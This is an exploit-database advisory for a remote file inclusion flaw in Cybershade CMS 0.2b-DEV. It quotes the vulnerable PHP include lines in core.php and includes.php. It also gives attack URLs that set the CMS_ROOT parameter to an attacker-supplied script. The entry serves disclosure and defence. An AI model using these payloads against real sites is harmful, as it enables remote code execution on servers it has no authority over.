Cybershade CMS 0.2 Remote File Inclusion Vulnerability

vendor:

Cybershade CMS

by:

Mr.SeCreT

8.8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Cybershade CMS

Affected Version From: 0.2b-DEV

Affected Version To: 0.2b-DEV

Patch Exists: YES

Related CWE: N/A

CPE: a:cybershadecms:cybershade_cms:0.2b-dev

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2008

Cybershade CMS 0.2 Remote File Inclusion Vulnerability

Cybershade CMS 0.2 is vulnerable to a Remote File Inclusion vulnerability due to the lack of sanitization of user-supplied input in the 'CMS_ROOT' parameter in the 'core.php' and 'includes.php' scripts. An attacker can exploit this vulnerability by sending a malicious URL in the 'CMS_ROOT' parameter, which will be executed by the vulnerable application.

Mitigation:

Input validation should be used to prevent the application from including files from external sources.

Source

Exploit-DB raw data:

###################### Author: #############################
Author: Mr.SeCreT
E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com>
From: Syria
<http://english.islamweb.net/>############## Script Information: #########################
Script: Cybershade CMS 0.2 Remote File Inclusion Vulnerability
Language: PHP
Download: http://sourceforge.net/projects/cybershadecms/files/cybershadecms/0.2b-DEV/cybershade_0.2b-DEV.zip/download
################### Vul Code: ##############################
core.php:
<?php
session_start();
error_reporting (E_ERROR | E_WARNING | E_PARSE); //this will be set to 0 when released, this is to stop any error's showing up
//error_reporting (0);
include $CMS_ROOT."core/base_functions.php"; //functions that the CMS will use
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
includes.php:
<?php
//This file has the main includes all in one file, this will enable us to change the files if we need to
include "xconnect.php"; //connection infomation
include $CMS_ROOT."core/core.php"; //main core of the CMS
include $CMS_ROOT."core/security.php"; //CMS security
include $CMS_ROOT."core/menus.php"; //Menus
include $CMS_ROOT."core/classes.php"; //Diffrent Classes
//include $CMS_ROOT."core/bbcode.php"; //bbcodes
template(); //call upon the template function
?>
################### Exploit: ###############################
www.site.com/path/core/core.php?CMS_ROOT=[Evil<http://www.site.com/path/core/core.php?CMS_ROOT=[Evil> Script]
www.site.com/path/core/includes.php?CMS_ROOT=[Evil<http://www.site.com/path/core/includes.php?CMS_ROOT=[Evil> Script]